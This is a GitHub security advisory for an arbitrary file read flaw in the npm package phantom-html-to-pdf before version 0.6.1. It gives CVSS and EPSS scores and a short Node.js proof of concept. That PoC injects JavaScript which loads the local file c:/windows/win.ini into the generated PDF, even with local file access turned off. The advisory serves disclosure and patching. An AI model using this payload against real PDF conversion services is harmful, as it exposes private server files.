GitHub Advisory DatabaseGHSA-6H7F-QWQM-35PPArbitrary File Read in phantom-html-to-pdf
5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
0.003 Low
EPSS
Percentile
65.7%
This affects the package phantom-html-to-pdf before 0.6.1.
PoC
var fs = require('fs') var conversion = require("phantom-html-to-pdf")();
conversion.allowLocalFilesAccess = false conversion({
html: "document.write(window.location='c:/windows/win.ini')"
}, function(err, pdf) {
var output = fs.createWriteStream('output.pdf') console.log(pdf.logs);
console.log(pdf.numberOfPages);
pdf.stream.pipe(output);
});
Affected configurations
| CPE | Name | Operator | Version |
|---|---|---|---|
| phantom-html-to-pdf | lt | 0.6.1 |
Related
5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
0.003 Low
EPSS
Percentile
65.7%